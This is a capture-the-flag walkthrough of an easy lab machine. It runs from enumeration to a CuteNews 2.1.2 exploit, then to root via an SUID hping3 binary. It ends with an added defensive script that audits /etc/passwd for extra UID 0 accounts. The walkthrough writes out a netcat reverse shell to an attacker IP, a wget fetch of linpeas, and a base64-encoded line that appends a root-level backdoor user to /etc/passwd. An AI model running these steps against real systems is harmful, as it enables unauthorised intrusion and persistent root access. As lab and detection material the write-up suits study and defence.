RATING
Easy
ENUMERATION
We kick it off with our usual nmap scan:
Command: nmap -sV -sC -T4 -Pn -p- 192.168.153.128

Heading over to the target in our browser, we get a default Apache server page:

Nothing else interesting there, so we proceed to run a directory brute force with feroxbuster and find index.php:
Command: feroxbuster -u http://192.168.153.128/ -w /usr/share/wordlists/dirb/common.txt -k -d 1 --quiet -s 200

Navigating to this in our browser, we see a login page for CuteNews running version 2.1.2:

Because we do not have any login credentials, we proceed to look for an exploit for CuteNews using searchsploit:
Command: searchsploit cutenews 2.1.2

EXPLOITATION
We proceed to download the 48800.py exploit:
Command: searchsploit -m 48800.py
Before we execute the exploit, we need to modify the code by removing all instances of the /CuteNews/ directory since our index.php is at the root of the server:

Running the exploit and entering our URL drops us into a command shell as user www-data:
Command: python3 48800.py

This shell is pretty unusable as is. Luckily, the target has netcat installed and we can use it to create a reverse shell:
Command: nc 192.168.45.166 443 -e /bin/bash

We can catch this reverse shell and upgrade it:
Command: nc -nvlp 443
Command: python3 -c 'import pty;pty.spawn("/bin/bash")'

PRIVILEGE ESCALATION
After transferring linpeas over to the target, we execute it and discover that the binary hping3 has the SUID bit set:
Command: python3 -m http.server 80 (on attacker machine)
Command: wget http://192.168.45.166/linpeas.sh (on target machine)
Command: chmod +x linpeas.sh
Command: ./linpeas.sh

We can execute this binary and it drops us into an hping3 shell with root privileges, but we are unable to run anything of real use with this shell:

Because we can use this shell to write to system files, we head back to our attacker machine and create a password hash for a new user, test:

We can then add the following line to /etc/passwd:
test:$1$test$tCFQ7vKVJd/qDz0psLYXd/:0:0::/root:/bin/bash
However, if we try this directly on the target, we get the following error:
Command: echo 'test:$1$test$tCFQ7vKVJd/qDz0psLYXd/:0:0::/root:/bin/bash' >> /etc/passwd

Heading back to our attacker machine, we can base64 encode our string:
Command: echo 'test:$1$test$tCFQ7vKVJd/qDz0psLYXd/:0:0::/root:/bin/bash' | base64

We can now echo the encoded string on our target and decode it before appending it to /etc/passwd, with no error this time:
Command: echo "dGVzdDokMSR0ZXN0JHRDRlE3dktWSmQvcUR6MHBzTFlYZC86MDowOjovcm9vdDovYmluL2Jhc2gK" | base64 -d >> /etc/passwd

Now, it is only a matter of switching to our test user and reading our flag:
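
Seen from the defender's side, the line appended to /etc/passwd above leaves two clear traces: a second UID 0 account, and a password hash stored in the passwd file itself. The audit below flags both. It is an added example, not part of the original walkthrough; the function names audit_passwd and write_sample and the finding labels are hypothetical, and the sample file is constructed (three stock entries plus the line appended above).

```sh
#!/bin/sh
# audit_passwd FILE: print one "FINDING<TAB>user<TAB>detail" line per issue.
# Exit status: 0 = clean, 1 = findings, 2 = file not readable.
audit_passwd() {
    [ -r "$1" ] || return 2
    awk -F: '
        /^[ \t]*(#|$)/ { next }    # skip comments and blank lines
        NF != 7 { print "MALFORMED\t" $1 "\tfields=" NF; bad = 1; next }
        $3 == 0 && $1 != "root" {
            print "EXTRA_UID0\t" $1 "\tshell=" $7; bad = 1
        }
        # A hash in field 2 is used instead of /etc/shadow, as the walkthrough shows.
        $2 ~ /^\$/ {
            scheme = ($2 ~ /^\$1\$/) ? "md5crypt" : "crypt"
            print "INLINE_HASH\t" $1 "\tscheme=" scheme; bad = 1
        }
        $2 == "" { print "EMPTY_PASSWORD\t" $1 "\tuid=" $3; bad = 1 }
        END { exit bad ? 1 : 0 }
    ' "$1"
}

# Constructed sample: three stock entries plus the line this walkthrough appends.
write_sample() {
    cat > "$1" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
test:$1$test$tCFQ7vKVJd/qDz0psLYXd/:0:0::/root:/bin/bash
EOF
}

sample=$(mktemp)
write_sample "$sample"
audit_passwd "$sample" || echo "exit status: $?"
rm -f "$sample"
```

Run against the real /etc/passwd on a schedule or from a file-integrity hook, any non-zero exit is worth an alert.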
